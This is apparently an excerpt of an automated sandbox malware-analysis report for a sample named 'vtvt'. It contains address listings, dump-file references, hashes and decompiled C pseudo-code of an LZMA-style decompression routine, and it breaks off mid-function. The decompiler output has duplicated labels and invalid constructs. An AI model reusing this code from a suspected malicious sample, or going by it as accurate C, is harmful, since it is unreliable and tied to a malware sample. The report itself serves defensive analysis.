                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004073ce
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407002

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 98%
                                                                                    			E0040711C() {
                                                                                    				unsigned short _t531;
                                                                                    				signed int _t532;
                                                                                    				void _t533;
                                                                                    				signed int _t534;
                                                                                    				signed int _t535;
                                                                                    				signed int _t565;
                                                                                    				signed int _t568;
                                                                                    				signed int _t589;
                                                                                    				signed int* _t606;
                                                                                    				void* _t613;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					if( *(_t613 - 0x40) != 0) {
                                                                                    						 *(_t613 - 0x84) = 0xb;
                                                                                    						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                    						goto L132;
                                                                                    					} else {
                                                                                    						__eax =  *(__ebp - 0x28);
                                                                                    						L88:
                                                                                    						 *(__ebp - 0x2c) = __eax;
                                                                                    						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    						L89:
                                                                                    						__eax =  *(__ebp - 4);
                                                                                    						 *(__ebp - 0x80) = 0x15;
                                                                                    						__eax =  *(__ebp - 4) + 0xa68;
                                                                                    						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                    						L69:
                                                                                    						 *(__ebp - 0x84) = 0x12;
                                                                                    						while(1) {
                                                                                    							L132:
                                                                                    							 *(_t613 - 0x54) = _t606;
                                                                                    							while(1) {
                                                                                    								L133:
                                                                                    								_t531 =  *_t606;
                                                                                    								_t589 = _t531 & 0x0000ffff;
                                                                                    								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                    								if( *(_t613 - 0xc) >= _t565) {
                                                                                    									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                    									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                    									 *(_t613 - 0x40) = 1;
                                                                                    									_t532 = _t531 - (_t531 >> 5);
                                                                                    									 *_t606 = _t532;
                                                                                    								} else {
                                                                                    									 *(_t613 - 0x10) = _t565;
                                                                                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                    								}
                                                                                    								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                    									goto L139;
                                                                                    								}
                                                                                    								L137:
                                                                                    								if( *(_t613 - 0x6c) == 0) {
                                                                                    									 *(_t613 - 0x88) = 5;
                                                                                    									L170:
                                                                                    									_t568 = 0x22;
                                                                                    									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                    									_t535 = 0;
                                                                                    									L172:
                                                                                    									return _t535;
                                                                                    								}
                                                                                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                    								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                    								L139:
                                                                                    								_t533 =  *(_t613 - 0x84);
                                                                                    								while(1) {
                                                                                    									 *(_t613 - 0x88) = _t533;
                                                                                    									while(1) {
                                                                                    										L1:
                                                                                    										_t534 =  *(_t613 - 0x88);
                                                                                    										if(_t534 > 0x1c) {
                                                                                    											break;
                                                                                    										}
                                                                                    										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                    											case 0:
                                                                                    												if( *(_t613 - 0x6c) == 0) {
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    												_t534 =  *( *(_t613 - 0x70));
                                                                                    												if(_t534 > 0xe1) {
                                                                                    													goto L171;
                                                                                    												}
                                                                                    												_t538 = _t534 & 0x000000ff;
                                                                                    												_push(0x2d);
                                                                                    												asm("cdq");
                                                                                    												_pop(_t570);
                                                                                    												_push(9);
                                                                                    												_pop(_t571);
                                                                                    												_t609 = _t538 / _t570;
                                                                                    												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                    												asm("cdq");
                                                                                    												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                    												 *(_t613 - 0x3c) = _t604;
                                                                                    												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                    												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                    												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                    												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                    													L10:
                                                                                    													if(_t612 == 0) {
                                                                                    														L12:
                                                                                    														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                    														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    														goto L15;
                                                                                    													} else {
                                                                                    														goto L11;
                                                                                    													}
                                                                                    													do {
                                                                                    														L11:
                                                                                    														_t612 = _t612 - 1;
                                                                                    														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                    													} while (_t612 != 0);
                                                                                    													goto L12;
                                                                                    												}
                                                                                    												if( *(_t613 - 4) != 0) {
                                                                                    													GlobalFree( *(_t613 - 4));
                                                                                    												}
                                                                                    												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    												 *(_t613 - 4) = _t534;
                                                                                    												if(_t534 == 0) {
                                                                                    													goto L171;
                                                                                    												} else {
                                                                                    													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                    													goto L10;
                                                                                    												}
                                                                                    											case 1:
                                                                                    												L13:
                                                                                    												__eflags =  *(_t613 - 0x6c);
                                                                                    												if( *(_t613 - 0x6c) == 0) {
                                                                                    													 *(_t613 - 0x88) = 1;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    												_t45 = _t613 - 0x48;
                                                                                    												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                    												__eflags =  *_t45;
                                                                                    												L15:
                                                                                    												if( *(_t613 - 0x48) < 4) {
                                                                                    													goto L13;
                                                                                    												}
                                                                                    												_t546 =  *(_t613 - 0x40);
                                                                                    												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                    													L20:
                                                                                    													 *(_t613 - 0x48) = 5;
                                                                                    													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                    													goto L23;
                                                                                    												}
                                                                                    												 *(_t613 - 0x74) = _t546;
                                                                                    												if( *(_t613 - 8) != 0) {
                                                                                    													GlobalFree( *(_t613 - 8));
                                                                                    												}
                                                                                    												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                    												 *(_t613 - 8) = _t534;
                                                                                    												if(_t534 == 0) {
                                                                                    													goto L171;
                                                                                    												} else {
                                                                                    													goto L20;
                                                                                    												}
                                                                                    											case 2:
                                                                                    												L24:
                                                                                    												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                    												 *(_t613 - 0x84) = 6;
                                                                                    												 *(_t613 - 0x4c) = _t553;
                                                                                    												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                    												L132:
                                                                                    												 *(_t613 - 0x54) = _t606;
                                                                                    												goto L133;
                                                                                    											case 3:
                                                                                    												L21:
                                                                                    												__eflags =  *(_t613 - 0x6c);
                                                                                    												if( *(_t613 - 0x6c) == 0) {
                                                                                    													 *(_t613 - 0x88) = 3;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    												_t67 = _t613 - 0x70;
                                                                                    												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                    												__eflags =  *_t67;
                                                                                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                    												L23:
                                                                                    												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                    												if( *(_t613 - 0x48) != 0) {
                                                                                    													goto L21;
                                                                                    												}
                                                                                    												goto L24;
                                                                                    											case 4:
                                                                                    												L133:
                                                                                    												_t531 =  *_t606;
                                                                                    												_t589 = _t531 & 0x0000ffff;
                                                                                    												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                    												if( *(_t613 - 0xc) >= _t565) {
                                                                                    													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                    													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                    													 *(_t613 - 0x40) = 1;
                                                                                    													_t532 = _t531 - (_t531 >> 5);
                                                                                    													 *_t606 = _t532;
                                                                                    												} else {
                                                                                    													 *(_t613 - 0x10) = _t565;
                                                                                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                    												}
                                                                                    												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                    													goto L139;
                                                                                    												}
                                                                                    											case 5:
                                                                                    												goto L137;
                                                                                    											case 6:
                                                                                    												__edx = 0;
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x34) = 1;
                                                                                    													 *(__ebp - 0x84) = 7;
                                                                                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                    													while(1) {
                                                                                    														L132:
                                                                                    														 *(_t613 - 0x54) = _t606;
                                                                                    														goto L133;
                                                                                    													}
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                    												__esi =  *(__ebp - 0x60);
                                                                                    												__cl = 8;
                                                                                    												__cl = 8 -  *(__ebp - 0x3c);
                                                                                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                    												__ecx =  *(__ebp - 0x3c);
                                                                                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                    												__ecx =  *(__ebp - 4);
                                                                                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                    												__eflags =  *(__ebp - 0x38) - 4;
                                                                                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    												if( *(__ebp - 0x38) >= 4) {
                                                                                    													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                    													if( *(__ebp - 0x38) >= 0xa) {
                                                                                    														_t98 = __ebp - 0x38;
                                                                                    														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                    														__eflags =  *_t98;
                                                                                    													} else {
                                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                    													}
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x38) = 0;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                    												if( *(__ebp - 0x34) == __edx) {
                                                                                    													__ebx = 0;
                                                                                    													__ebx = 1;
                                                                                    													goto L61;
                                                                                    												} else {
                                                                                    													__eax =  *(__ebp - 0x14);
                                                                                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    													__eflags = __eax -  *(__ebp - 0x74);
                                                                                    													if(__eax >=  *(__ebp - 0x74)) {
                                                                                    														__eax = __eax +  *(__ebp - 0x74);
                                                                                    														__eflags = __eax;
                                                                                    													}
                                                                                    													__ecx =  *(__ebp - 8);
                                                                                    													__ebx = 0;
